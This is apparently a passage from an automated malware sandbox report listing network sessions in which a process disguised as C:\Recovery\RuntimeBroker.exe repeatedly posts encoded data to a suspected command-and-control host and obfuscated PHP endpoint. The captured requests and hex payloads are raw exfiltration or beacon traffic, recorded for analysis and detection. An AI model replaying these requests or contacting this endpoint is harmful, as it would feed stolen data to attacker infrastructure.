                                                                                                            Data Ascii: TP[SVQY_\XZQP]XV[T^_U]Z^__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$- )?+="Z)'&$"8(U=#;*'>->! #9)5&[!"^.
                                                                                                            Nov 12, 2024 00:43:59.082463026 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:59.166461945 CET  158  IN  HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:58 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                            129  192.168.2.4  50136  37.44.238.250  80  4076  C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                                            Nov 12, 2024 00:43:59.360807896 CET  316  OUT  POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 1820
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive


                                                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                            130  192.168.2.4  50137  37.44.238.250  80  4076  C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                                            Nov 12, 2024 00:43:59.698406935 CET  316  OUT  POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:44:00.057513952 CET  2512  OUT  Data Raw: 51 52 5b 50 56 50 5c 5f 5c 58 5a 51 50 5b 58 57 5b 5c 5e 5a 55 5f 5a 5e 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QR[PVP\_\XZQP[XW[\^ZU_Z^__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\':V*=;!#?9$&'">0=!0>*C:#&?&[!"^.-
                                                                                                            Nov 12, 2024 00:44:00.263124943 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:44:00.341254950 CET  158  IN  HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:44:00 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                            131  192.168.2.4  50138  37.44.238.250  80  4076  C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                                            Nov 12, 2024 00:44:00.469882965 CET  292  OUT  POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:44:00.823219061 CET  2512  OUT  Data Raw: 51 53 5b 5f 56 5c 59 59 5c 58 5a 51 50 5b 58 54 5b 51 5e 5d 55 5e 5a 5d 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QS[_V\YY\XZQP[XT[Q^]U^Z]__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'^.06Z);V#,%$6;!8$U=.Z!>36>= (&[!"^.-
                                                                                                            Nov 12, 2024 00:44:01.035492897 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:44:01.109524012 CET  158  IN  HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:44:00 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                            132  192.168.2.4  50139  37.44.238.250  80  4076  C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                                            Nov 12, 2024 00:44:01.232819080 CET  292  OUT  POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:44:01.589148998 CET  2512  OUT  Data Raw: 54 50 5b 50 53 5a 59 58 5c 58 5a 51 50 5f 58 5c 5b 53 5e 5e 55 55 5a 55 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TP[PSZYX\XZQP_X\[S^^UUZU__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'9#6Z>!S5?5$,X!$=">3>%]*6&X! =)%&[!"^.=
                                                                                                            Nov 12, 2024 00:44:01.815957069 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:44:01.891743898 CET  158  IN  HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:44:01 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                            133  192.168.2.4  50140  37.44.238.250  80  4076  C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                                            Nov 12, 2024 00:44:02.164490938 CET  316  OUT  POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:44:02.510689020 CET  2512  OUT  Data Raw: 54 55 5b 54 53 5b 5c 59 5c 58 5a 51 50 5f 58 53 5b 51 5e 58 55 58 5a 5f 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TU[TS[\Y\XZQP_XS[Q^XUXZ___B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'-01)5<93%8";8(3!^!T'=6>9#V")5&[!"^.=
                                                                                                            Nov 12, 2024 00:44:02.745313883 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:44:02.826277018 CET  158  IN  HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:44:02 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                            134  192.168.2.4  50141  37.44.238.250  80  4076  C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                                            Nov 12, 2024 00:44:03.023514986 CET  316  OUT  POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:44:03.370104074 CET  2512  OUT  Data Raw: 51 55 5e 55 56 5e 5c 5a 5c 58 5a 51 50 52 58 5c 5b 5d 5e 5c 55 59 5a 5d 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QU^UV^\Z\XZQPRX\[]^\UYZ]__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\':0!>!!,E$%$X!(,T*0:Y6+9W$-)]*%%!05(%&[!"^.
Nov 12, 2024 00:44:03.591658115 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:44:03.673135042 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:44:03 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
135 | 192.168.2.4 | 50142 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:44:03.800299883 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
Nov 12, 2024 00:44:04.151319981 CET | 2512 | OUT | Data Raw: 54 52 5b 5f 53 5f 59 5c 5c 58 5a 51 50 5d 58 52 5b 52 5e 5e 55 58 5a 54 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TR[_S_Y\\XZQP]XR[R^^UXZT__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'^:"\=.#/%$8^68*U=6.32=>\!#"?&[!"^.
Nov 12, 2024 00:44:04.367026091 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:44:04.448782921 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:44:04 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
136 | 192.168.2.4 | 50143 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:44:04.578011036 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
137 | 192.168.2.4 | 50144 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:44:04.712662935 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 1828
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
Nov 12, 2024 00:44:05.057579041 CET | 1828 | OUT | Data Raw: 54 5f 5e 54 53 5f 59 5a 5c 58 5a 51 50 5a 58 55 5b 51 5e 58 55 5b 5a 55 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: T_^TS_YZ\XZQPZXU[Q^XU[ZU__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'^-1)]""6E05Y";4V>0&!5W'1X*43%Z+%&[!"^.-
Nov 12, 2024 00:44:05.279916048 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:44:05.353663921 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:44:05 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 152
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 02 1e 22 0a 3f 3e 30 00 36 3c 24 52 2e 3e 26 57 26 56 34 5c 3f 3b 20 1a 21 07 24 11 2c 1d 31 1f 34 3e 2c 17 27 3a 35 13 22 3c 21 50 3f 02 21 5b 05 12 22 02 23 3b 20 55 3f 3f 2b 01 39 22 2f 5c 36 1e 23 15 2d 39 30 0a 29 39 17 52 24 02 03 0f 24 0f 38 59 3a 07 3e 14 28 11 06 0c 22 34 2e 55 0b 11 20 0b 24 16 38 0d 34 11 3f 5f 32 3e 27 09 22 3e 35 08 32 2a 06 54 31 04 38 00 25 1f 08 5d 32 1c 3a 5f 32 04 21 59 3d 3a 2f 10 33 00 23 51 2d 05 2f 56 03 3d 5b 57
                                                                                                            Data Ascii: "?>06<$R.>&W&V4\?; !$,14>,':5"<!P?!["#; U??+9"/\6#-90)9R$$8Y:>("4.U $84?_2>'">52*T18%]2:_2!Y=:/3#Q-/V=[W


Session ID | Source IP | Source Port | Destination IP | Destination Port
138 | 192.168.2.4 | 50145 | 37.44.238.250 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:44:04.869956017 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
Nov 12, 2024 00:44:05.229383945 CET | 2512 | OUT | Data Raw: 54 57 5e 56 56 5b 5c 58 5c 58 5a 51 50 59 58 5d 5b 53 5e 5d 55 55 5a 59 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TW^VV[\X\XZQPYX][S^]UUZY__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$-.]*2#?='/5(8(0!#8>0>)C=436?&[!"^.%
Nov 12, 2024 00:44:05.435323000 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:44:05.671345949 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:44:05 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ
Nov 12, 2024 00:44:05.671360970 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:44:05 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port
139 | 192.168.2.4 | 50146 | 37.44.238.250 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:44:05.798001051 CET | 292 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
Nov 12, 2024 00:44:06.151338100 CET | 2512 | OUT | Data Raw: 51 53 5e 51 56 50 5c 5f 5c 58 5a 51 50 5b 58 57 5b 5d 5e 5a 55 5c 5a 59 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QS^QVP\_\XZQP[XW[]^ZU\ZY__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\':.=(15*3C4",R(3!-P$(%%43%^+%&[!"^.-
Nov 12, 2024 00:44:06.381900072 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:44:06.454222918 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:44:06 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port
140 | 192.168.2.4 | 50147 | 37.44.238.250 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:44:06.594415903 CET | 292 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2504
                                                                                                            Expect: 100-continue
Nov 12, 2024 00:44:06.948199987 CET | 2504 | OUT | Data Raw: 54 52 5e 55 53 5c 5c 5f 5c 58 5a 51 50 5a 58 51 5b 57 5e 5d 55 5a 5a 5f 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TR^US\\_\XZQPZXQ[W^]UZZ___B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'X90.[)=#,%06,Z"$T)U&Y6;)0-Z> 3=(&[!"^.=
Nov 12, 2024 00:44:07.162019968 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:44:07.235842943 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:44:07 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port
141 | 192.168.2.4 | 50148 | 37.44.238.250 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:44:07.355671883 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
Nov 12, 2024 00:44:07.713800907 CET | 2512 | OUT | Data Raw: 54 50 5b 57 53 5b 5c 59 5c 58 5a 51 50 53 58 51 5b 57 5e 58 55 5c 5a 5c 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TP[WS[\Y\XZQPSXQ[W^XU\Z\__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'_-&*50$ ;8S*&Z"*3X)]>!# :)%&[!"^.
Nov 12, 2024 00:44:07.922808886 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:44:07.999963999 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:44:07 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port
142 | 192.168.2.4 | 50149 | 37.44.238.250 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:44:08.126178980 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
Nov 12, 2024 00:44:08.479433060 CET | 2512 | OUT | Data Raw: 51 52 5e 55 56 5b 5c 59 5c 58 5a 51 50 58 58 57 5b 57 5e 51 55 55 5a 5f 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QR^UV[\Y\XZQPXXW[W^QUUZ___B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$,3.\*+5&0&;68<R(3"-%=-*)#3)+&[!"^.!
Nov 12, 2024 00:44:08.691178083 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:44:08.765296936 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:44:08 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port
143 | 192.168.2.4 | 50150 | 37.44.238.250 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:44:08.888245106 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
